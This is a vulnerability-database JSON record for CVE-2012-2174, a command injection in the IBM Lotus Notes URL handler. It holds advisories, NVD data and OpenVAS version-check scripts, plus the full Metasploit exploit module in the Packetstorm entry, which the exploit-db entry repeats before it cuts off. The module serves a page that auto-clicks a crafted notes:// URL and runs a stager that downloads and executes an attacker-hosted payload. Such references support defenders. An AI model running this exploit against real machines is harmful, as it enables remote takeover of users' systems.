Lotus Notes is the client for Lotus Domino servers.
Problem
Lotus Notes 8.5.3 (and earlier) is vulnerable to remote code execution when handling a specially crafted URL. A remote attacker can pass the -RPARAMS command line argument to notes.exe, which then launches rpclauncher.exe. Also supplying the java -vm command allows the attacker to execute arbitrary code in the context of the notes.exe process.
This exploit has been tested against IBM Lotus Notes 8.5.3 FP1 on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn).
The user must open the HTML page using Internet Explorer 8 or 9 on the target.
The binary 'smbclient' must be available to the script.
The target must be able to access the specified SMB share anonymously.
A valid login and password with write permission for the specified SMB share are required.
Platforms
Windows
{"type": "saint", "published": "2012-09-07T00:00:00", "reporter": "SAINT Corporation", "bulletinFamily": "exploit", "id": "SAINT:4C6CD66A579269BBC6A033367A5ED1B9", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-2174"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803214", "OPENVAS:803214"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/NOTES_HANDLER_CMDINJECT", "MSF:AUXILIARY/SQLI/ORACLE/DBMS_CDC_IPUBLISH"]}, {"type": "exploitdb", "idList": ["EDB-ID:23650"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12529", "SECURITYVULNS:DOC:28414"]}, {"type": "zdi", "idList": ["ZDI-12-154"]}, {"type": "seebug", "idList": ["SSV:60226"]}, {"type": "nessus", "idList": ["LOTUS_NOTES_8_5_3_FP2.NASL"]}, {"type": "saint", "idList": ["SAINT:C627294DBD8C18A68C09D1F058347049", "SAINT:3F9E88E38CBA8EE7DA7355EC30D530D3"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:119058"]}, {"type": "d2", "idList": ["D2SEC_NOTESURL"]}], "modified": "2019-05-29T19:19:28", "rev": 2}, "score": {"value": 9.8, "vector": "NONE", "modified": "2019-05-29T19:19:28", "rev": 2}, "vulnersScore": 9.8}, "edition": 2, "viewCount": 6, "cvelist": ["CVE-2012-2174"], "references": [], "lastseen": "2019-05-29T19:19:28", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/lotus_notes_url_handler", "modified": "2012-09-07T00:00:00", "title": "IBM Lotus Notes URL Handler Command Execution", "description": "Added: 09/07/2012 \nCVE: [CVE-2012-2174](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2174>) \nBID: [54070](<http://www.securityfocus.com/bid/54070>) \nOSVDB: [83063](<http://www.osvdb.org/83063>) \n\n\n### Background\n\n[Lotus Notes](<http://www.lotus.com/notes>) is the client for Lotus Domino servers. \n\n### Problem\n\nLotus Notes 8.5.3 (and earlier) is vulnerable to remote code execution when handling a specially crafted URL. A remote attacker can pass the `-RPARAMS` command line argument to `notes.exe`, which then launches `rpclauncher.exe`. Also supplying the java `-vm` command allows the attacker to execute arbitrary code in the context of the `notes.exe` process. \n\n### Resolution\n\nApply the updates as described in the [IBM Security Bulletin](<http://www-01.ibm.com/support/docview.wss?uid=swg21598348>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-12-154/> \n\n\n### Limitations\n\nThis exploit has been tested against IBM Lotus Notes 8.5.3 FP1 on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn). \n\nThe user must open the HTML page using Internet Explorer 8 or 9 on the target. \n\nThe binary 'smbclient' must be available to the script. \n\nThe target must be able to access the specified SMB share anonymously. \n\nA valid login and password with write permission for the specified SMB share are required. \n\n### Platforms\n\nWindows \n \n\n", "scheme": null}
{"cve": [{"lastseen": "2021-02-02T05:59:48", "description": "The URL handler in IBM Lotus Notes 8.x before 8.5.3 FP2 allows remote attackers to execute arbitrary code via a crafted notes:// URL.", "edition": 4, "cvss3": {}, "published": "2012-06-20T10:27:00", "title": "CVE-2012-2174", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2174"], "modified": "2017-08-29T01:31:00", "cpe": ["cpe:/a:ibm:lotus_notes:8.5.1", "cpe:/a:ibm:lotus_notes:8.5.2.3", "cpe:/a:ibm:lotus_notes:8.5.0.1", "cpe:/a:ibm:lotus_notes:8.0.2.6", "cpe:/a:ibm:lotus_notes:8.0.2.0", "cpe:/a:ibm:lotus_notes:8.5", "cpe:/a:ibm:lotus_notes:8.5.1.4", "cpe:/a:ibm:lotus_notes:8.5.2.2", "cpe:/a:ibm:lotus_notes:8.0", "cpe:/a:ibm:lotus_notes:8.5.2.1", "cpe:/a:ibm:lotus_notes:8.5.1.3", "cpe:/a:ibm:lotus_notes:8.0.2.3", "cpe:/a:ibm:lotus_notes:8.5.3", "cpe:/a:ibm:lotus_notes:8.0.2.4", "cpe:/a:ibm:lotus_notes:8.5.3.1", "cpe:/a:ibm:lotus_notes:8.0.2", "cpe:/a:ibm:lotus_notes:8.5.2.0", "cpe:/a:ibm:lotus_notes:8.0.2.1", "cpe:/a:ibm:lotus_notes:8.5.1.1", "cpe:/a:ibm:lotus_notes:8.5.1.5", "cpe:/a:ibm:lotus_notes:8.0.0", "cpe:/a:ibm:lotus_notes:8.0.1", "cpe:/a:ibm:lotus_notes:8.5.1.0", "cpe:/a:ibm:lotus_notes:8.5.1.2", "cpe:/a:ibm:lotus_notes:8.5.0.0", "cpe:/a:ibm:lotus_notes:8.0.2.5", "cpe:/a:ibm:lotus_notes:8.0.2.2"], "id": "CVE-2012-2174", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2174", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:ibm:lotus_notes:8.5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.1.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-02T21:11:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2174"], "description": "This host is installed with IBM Lotus Notes and is prone to remote\n code execution vulnerability.", "modified": "2017-05-05T00:00:00", "published": "2013-01-23T00:00:00", "id": "OPENVAS:803214", "href": "http://plugins.openvas.org/nasl.php?oid=803214", "type": "openvas", "title": "IBM Lotus Notes URL Command Injection RCE Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ibm_lotus_notes_url_cmd_inj_rce_vuln_win.nasl 6074 2017-05-05 09:03:14Z teissa $\n#\n# IBM Lotus Notes URL Command Injection RCE Vulnerability (Windows)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attackers to execute arbitrary code via a\n malicious URLs.\n Impact Level: System/Application\";\n\ntag_affected = \"IBM Lotus Notes Version 8.x before 8.5.3 FP2 on windows\";\ntag_insight = \"An error exists within the URL handler which allows attackers to execute\n commands on the target.\";\ntag_solution = \"Upgrade to IBM Lotus Notes 8.5.3 FP2 or later,\n For updates refer to http://www-304.ibm.com/support/docview.wss?uid=swg21598348\";\ntag_summary = \"This host is installed with IBM Lotus Notes and is prone to remote\n code execution vulnerability.\";\n\nif(description)\n{\n script_id(803214);\n script_version(\"$Revision: 6074 $\");\n script_cve_id(\"CVE-2012-2174\");\n script_bugtraq_id(54070);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-05 11:03:14 +0200 (Fri, 05 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-23 11:08:14 +0530 (Wed, 23 Jan 2013)\");\n script_name(\"IBM Lotus Notes URL Command Injection RCE Vulnerability (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/49601\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/id?1027427\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/75320\");\n script_xref(name : \"URL\" , value : \"http://www.exploit-db.com/exploits/23650\");\n script_xref(name : \"URL\" , value : \"http://www.zerodayinitiative.com/advisories/ZDI-12-154\");\n script_xref(name : \"URL\" , value : \"http://www-304.ibm.com/support/docview.wss?uid=swg21598348\");\n script_xref(name : \"URL\" , value : \"http://packetstormsecurity.com/files/119058/IBM-Lotus-Notes-Client-URL-Handler-Command-Injection.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_ibm_lotus_notes_detect_win.nasl\");\n script_require_keys(\"IBM/LotusNotes/Win/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nlotusVer = \"\";\n\n## Get for IBM Lotus Notes Version\nlotusVer = get_kb_item(\"IBM/LotusNotes/Win/Ver\");\nif(!lotusVer){\n exit(0);\n}\n\n## Check for IBM Lotus Notes Version 8.x < 8.5.3 FP2 [8.5.32.12184]\nif(lotusVer =~ \"^8\" &&\n version_is_less(version:lotusVer, test_version:\"8.5.32.12184\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2174"], "description": "This host is installed with IBM Lotus Notes and is prone to remote\n code execution vulnerability.", "modified": "2018-10-12T00:00:00", "published": "2013-01-23T00:00:00", "id": "OPENVAS:1361412562310803214", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803214", "type": "openvas", "title": "IBM Lotus Notes URL Command Injection RCE Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ibm_lotus_notes_url_cmd_inj_rce_vuln_win.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# IBM Lotus Notes URL Command Injection RCE Vulnerability (Windows)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803214\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2012-2174\");\n script_bugtraq_id(54070);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-23 11:08:14 +0530 (Wed, 23 Jan 2013)\");\n script_name(\"IBM Lotus Notes URL Command Injection RCE Vulnerability (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/49601\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id?1027427\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/75320\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/23650\");\n script_xref(name:\"URL\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-12-154\");\n script_xref(name:\"URL\", value:\"http://www-304.ibm.com/support/docview.wss?uid=swg21598348\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/119058/IBM-Lotus-Notes-Client-URL-Handler-Command-Injection.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_ibm_lotus_notes_detect_win.nasl\");\n script_mandatory_keys(\"IBM/LotusNotes/Win/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary code via a\n malicious URLs.\");\n script_tag(name:\"affected\", value:\"IBM Lotus Notes Version 8.x before 8.5.3 FP2 on windows\");\n script_tag(name:\"insight\", value:\"An error exists within the URL handler which allows attackers to execute\n commands on the target.\");\n script_tag(name:\"solution\", value:\"Upgrade to IBM Lotus Notes 8.5.3 FP2 or later.\");\n script_tag(name:\"summary\", value:\"This host is installed with IBM Lotus Notes and is prone to remote\n code execution vulnerability.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nlotusVer = get_kb_item(\"IBM/LotusNotes/Win/Ver\");\nif(!lotusVer){\n exit(0);\n}\n\nif(lotusVer =~ \"^8\" &&\n version_is_less(version:lotusVer, test_version:\"8.5.32.12184\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "d2": [{"lastseen": "2019-05-29T19:19:04", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2174"], "description": "**Name**| d2sec_notesurl \n---|--- \n**CVE**| CVE-2012-2174 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| IBM Lotus Notes URL Command Injection Remote Code Execution Vulnerability \n**Notes**| \n", "edition": 2, "modified": "2012-06-20T10:27:00", "published": "2012-06-20T10:27:00", "id": "D2SEC_NOTESURL", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_notesurl", "title": "DSquare Exploit Pack: D2SEC_NOTESURL", "type": "d2", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:01:53", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2174"], "description": "Added: 09/07/2012 \nCVE: [CVE-2012-2174](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2174>) \nBID: [54070](<http://www.securityfocus.com/bid/54070>) \nOSVDB: [83063](<http://www.osvdb.org/83063>) \n\n\n### Background\n\n[Lotus Notes](<http://www.lotus.com/notes>) is the client for Lotus Domino servers. \n\n### Problem\n\nLotus Notes 8.5.3 (and earlier) is vulnerable to remote code execution when handling a specially crafted URL. A remote attacker can pass the `-RPARAMS` command line argument to `notes.exe`, which then launches `rpclauncher.exe`. Also supplying the java `-vm` command allows the attacker to execute arbitrary code in the context of the `notes.exe` process. \n\n### Resolution\n\nApply the updates as described in the [IBM Security Bulletin](<http://www-01.ibm.com/support/docview.wss?uid=swg21598348>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-12-154/> \n\n\n### Limitations\n\nThis exploit has been tested against IBM Lotus Notes 8.5.3 FP1 on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn). \n\nThe user must open the HTML page using Internet Explorer 8 or 9 on the target. \n\nThe binary 'smbclient' must be available to the script. \n\nThe target must be able to access the specified SMB share anonymously. \n\nA valid login and password with write permission for the specified SMB share are required. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2012-09-07T00:00:00", "published": "2012-09-07T00:00:00", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/lotus_notes_url_handler", "id": "SAINT:3F9E88E38CBA8EE7DA7355EC30D530D3", "type": "saint", "title": "IBM Lotus Notes URL Handler Command Execution", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:32", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2174"], "description": "Added: 09/07/2012 \nCVE: [CVE-2012-2174](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2174>) \nBID: [54070](<http://www.securityfocus.com/bid/54070>) \nOSVDB: [83063](<http://www.osvdb.org/83063>) \n\n\n### Background\n\n[Lotus Notes](<http://www.lotus.com/notes>) is the client for Lotus Domino servers. \n\n### Problem\n\nLotus Notes 8.5.3 (and earlier) is vulnerable to remote code execution when handling a specially crafted URL. A remote attacker can pass the `-RPARAMS` command line argument to `notes.exe`, which then launches `rpclauncher.exe`. Also supplying the java `-vm` command allows the attacker to execute arbitrary code in the context of the `notes.exe` process. \n\n### Resolution\n\nApply the updates as described in the [IBM Security Bulletin](<http://www-01.ibm.com/support/docview.wss?uid=swg21598348>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-12-154/> \n\n\n### Limitations\n\nThis exploit has been tested against IBM Lotus Notes 8.5.3 FP1 on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn). \n\nThe user must open the HTML page using Internet Explorer 8 or 9 on the target. \n\nThe binary 'smbclient' must be available to the script. \n\nThe target must be able to access the specified SMB share anonymously. \n\nA valid login and password with write permission for the specified SMB share are required. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2012-09-07T00:00:00", "published": "2012-09-07T00:00:00", "id": "SAINT:C627294DBD8C18A68C09D1F058347049", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/lotus_notes_url_handler", "title": "IBM Lotus Notes URL Handler Command Execution", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:04", "description": "", "published": "2012-12-24T00:00:00", "type": "packetstorm", "title": "IBM Lotus Notes Client URL Handler Command Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2174"], "modified": "2012-12-24T00:00:00", "id": "PACKETSTORM:119058", "href": "https://packetstormsecurity.com/files/119058/IBM-Lotus-Notes-Client-URL-Handler-Command-Injection.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"IBM Lotus Notes Client URL Handler Command Injection\", \n'Description' => %q{ \nThis modules exploits a command injection vulnerability in the URL handler for \nfor the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with \nan specially crafted notes:// URL to execute arbitrary commands with also arbitrary \narguments. This module has been tested successfully on Windows XP SP3 with IE8, \nGoogle Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Moritz Jodeit', # Vulnerability discovery \n'Sean de Regge', # Vulnerability analysis \n'juan vazquez' # Metasploit \n], \n'References' => \n[ \n[ 'CVE', '2012-2174' ], \n[ 'OSVDB', '83063' ], \n[ 'BID', '54070' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-154/' ], \n[ 'URL', 'http://pwnanisec.blogspot.com/2012/10/exploiting-command-injection.html' ], \n[ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21598348' ] \n], \n'Payload' => \n{ \n'Space' => 2048, \n'StackAdjustment' => -3500 \n}, \n'DefaultOptions' => \n{ \n'EXITFUNC' => \"none\", \n'InitialAutoRunScript' => 'migrate -k -f' \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', {} ] \n], \n'Privileged' => false, \n'DisclosureDate' => \"Jun 18 2012\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) \n], self.class) \nend \n \ndef exploit \n@exe_name = rand_text_alpha(2) + \".exe\" \n@stage_name = rand_text_alpha(2) + \".js\" \nsuper \nend \n \ndef on_new_session(session) \nif session.type == \"meterpreter\" \nsession.core.use(\"stdapi\") unless session.ext.aliases.include?(\"stdapi\") \nend \n \n@dropped_files.delete_if do |file| \nwin_file = file.gsub(\"/\", \"\\\\\\\\\") \nif session.type == \"meterpreter\" \nbegin \nwintemp = session.fs.file.expand_path(\"%TEMP%\") \nwin_file = \"#{wintemp}\\\\#{win_file}\" \n# Meterpreter should do this automatically as part of \n# fs.file.rm(). Until that has been implemented, remove the \n# read-only flag with a command. \nsession.shell_command_token(%Q|attrib.exe -r \"#{win_file}\"|) \nsession.fs.file.rm(win_file) \nprint_good(\"Deleted #{file}\") \ntrue \nrescue ::Rex::Post::Meterpreter::RequestError \nprint_error(\"Failed to delete #{win_file}\") \nfalse \nend \n \nend \nend \n \nend \n \ndef on_request_uri(cli, request) \n \nif request.uri =~ /\\.exe$/ \nreturn if ((p=regenerate_payload(cli))==nil) \nregister_file_for_cleanup(\"#{@stage_name}\") unless @dropped_files and @dropped_files.include?(\"#{@stage_name}\") \nregister_file_for_cleanup(\"#{@exe_name}\") unless @dropped_files and @dropped_files.include?(\"#{@exe_name}\") \ndata = generate_payload_exe({:code=>p.encoded}) \nprint_status(\"Sending payload\") \nsend_response(cli, data, {'Content-Type'=>'application/octet-stream'}) \nreturn \nend \n \nmy_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] \nif datastore['SSL'] \nschema = \"https\" \nelse \nschema = \"http\" \nend \nuri = \"#{schema}://#{my_host}\" \nuri << \":#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.exe\" \n \nscript = \"var w=new ActiveXObject('wscript.shell');\" \nscript << \"w.CurrentDirectory=w.ExpandEnvironmentStrings('\\\\%TEMP\\\\%');\" \nscript << \"var x=new ActiveXObject('Microsoft.XMLHTTP');\" \nscript << \"x.open('GET','#{uri}', false);\" \nscript << \"x.send();\" \nscript << \"var s=new ActiveXObject('ADODB.Stream');\" \nscript << \"s.Mode=3;\" \nscript << \"s.Type=1;\" \nscript << \"s.Open();\" \nscript << \"s.Write(x.responseBody);\" \nscript << \"s.SaveToFile('#{@exe_name}',2);\" \nscript << \"w.Run('#{@exe_name}');\" \n \nvmargs = \"/q /s /c echo #{script} > %TEMP%\\\\\\\\#{@stage_name}& start cscript %TEMP%\\\\\\\\#{@stage_name}& REM\" \n \nlink_id = rand_text_alpha(5 + rand(5)) \n \njs_click_link = %Q| \nfunction clickLink(link) { \nvar cancelled = false; \n \nif (document.createEvent) { \nvar event = document.createEvent(\"MouseEvents\"); \nevent.initMouseEvent(\"click\", true, true, window, \n0, 0, 0, 0, 0, \nfalse, false, false, false, \n0, null); \ncancelled = !link.dispatchEvent(event); \n} \nelse if (link.fireEvent) { \ncancelled = !link.fireEvent(\"onclick\"); \n} \n \nif (!cancelled) { \nwindow.location = link.href; \n} \n} \n| \n \nif datastore['OBFUSCATE'] \njs_click_link = ::Rex::Exploitation::JSObfu.new(js_click_link) \njs_click_link.obfuscate \njs_click_link_fn = js_click_link.sym('clickLink') \nelse \njs_click_link_fn = 'clickLink' \nend \n \n \nhtml = <<-EOS \n<html> \n<head> \n<script> \n#{js_click_link} \n</script> \n</head> \n<body onload=\"#{js_click_link_fn}(document.getElementById('#{link_id}'));\"> \n<a id=\"#{link_id}\" href=\"notes://#{rand_text_alpha_upper(3+rand(3))}/#{rand_text_alpha_lower(3+rand(3))} -RPARAMS java -vm c:\\\\windows\\\\system32\\\\cmd.exe -vmargs #{vmargs}\"></a> \n</body> \n</html> \nEOS \n \nprint_status(\"Sending html\") \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \n \nend \n \nend`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/119058/notes_handler_cmdinject.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-02T21:28:44", "description": "IBM Lotus Notes Client URL Handler Command Injection. CVE-2012-2174. Remote exploit for windows platform", "published": "2012-12-25T00:00:00", "type": "exploitdb", "title": "IBM Lotus Notes Client URL Handler Command Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2174"], "modified": "2012-12-25T00:00:00", "id": "EDB-ID:23650", "href": "https://www.exploit-db.com/exploits/23650/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::EXE\r\n\tinclude Msf::Exploit::FileDropper\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => \"IBM Lotus Notes Client URL Handler Command Injection\",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis modules exploits a command injection vulnerability in the URL handler for\r\n\t\t\t\tfor the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with\r\n\t\t\t\tan specially crafted notes:// URL to execute arbitrary commands with also arbitrary\r\n\t\t\t\targuments. This module has been tested successfully on Windows XP SP3 with IE8,\r\n\t\t\t\tGoogle Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Moritz Jodeit', # Vulnerability discovery\r\n\t\t\t\t\t'Sean de Regge', # Vulnerability 